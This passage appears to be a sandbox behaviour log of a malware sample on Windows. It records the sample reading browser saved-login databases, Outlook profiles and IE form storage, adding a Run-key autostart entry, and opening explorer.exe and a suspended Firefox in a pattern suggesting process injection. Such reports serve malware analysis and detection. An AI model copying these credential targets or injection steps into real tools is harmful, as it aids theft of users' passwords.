| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\Opera Software\Opera Stable\Login Data | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrv.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrv.ini | desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| Get Info | \??\C:\Windows\SysWOW64\ntdll.dll | type = extended |
|
3 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe | type = extended |
|
2 | |
| Get Info | \??\C:\Windows\System32\drivers\etc\hosts | type = extended |
|
2 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS | type = extended |
|
1 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | type = extended |
|
1 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | type = extended |
|
57 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logri.ini | type = extended |
|
1 | |
| Get Info | \??\C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | type = extended |
|
1 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = extended |
|
1 | |
| Get Info | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrv.ini | type = extended |
|
1 | |
| Get Info | \??\C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | type = extended |
|
2 | |
| Read | \??\C:\Windows\SysWOW64\ntdll.dll | offset = 0, size = 1292096 |
|
1 | |
| Read | \??\C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe | offset = 0, size = 647432 |
|
1 | |
| Read | \??\C:\Windows\System32\drivers\etc\hosts | offset = 0, size = 824 |
|
1 | |
| Read | \??\C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | offset = 0, size = 275568 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 0, size = 40 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 40, size = 12 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 52, size = 82 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 134, size = 18 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 152, size = 22 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 174, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 198, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 218, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 244, size = 18 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 262, size = 28 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 290, size = 6 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 296, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 322, size = 46 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 368, size = 32 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 400, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 420, size = 4 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 424, size = 12 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 436, size = 82 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 518, size = 18 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 536, size = 22 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 558, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 584, size = 34 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 618, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 644, size = 28 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 672, size = 12 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 684, size = 34 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 718, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 742, size = 16 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 758, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 782, size = 14 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 796, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 816, size = 34 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 850, size = 46 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 896, size = 6 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 902, size = 32 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 934, size = 16 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 950, size = 46 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 996, size = 180 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1176, size = 48 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1224, size = 28 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1252, size = 32 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1284, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1304, size = 4 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1308, size = 12 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1320, size = 82 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1402, size = 18 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1420, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1444, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1468, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1488, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1514, size = 24 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1538, size = 28 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1566, size = 6 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1572, size = 26 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1598, size = 34 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1632, size = 32 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1664, size = 20 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | offset = 1684, size = 4 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logri.ini | offset = 0, size = 40 |
|
1 | |
| Write | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrv.ini | offset = 0, size = 40 |
|
1 |
Registry (98)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\ | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook_2016\ | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\ | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird\ | - |
|
1 | |
| Create Key | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = ProductName |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\ | value_name = CurrentVersion |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | value_name = Install Directory |
|
1 | |
| Write Value | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = L4NHR, data = C:\Program Files (x86)\Flpxdufw0\mskr8xjle.exe, size = 92, type = REG_SZ |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\ | - |
|
14 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
3 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\ | - |
|
1 | |
| Enumerate Keys | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook_2016\ | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | - |
|
1 | |
| Enumerate Values | HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
1 |
Process (6)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SysWOW64\cmd.exe | os_pid = 0xb70, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | os_pid = 0xb38, creation_flags = CREATE_SUSPENDED, CREATE_DETACHED_PROCESS, show_window = SW_HIDE |
|
1 | |
| Get Info | c:\windows\explorer.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | type = PROCESS_WOW64_INFORMATION |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 |
Thread (7)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Suspend | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Get Context | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
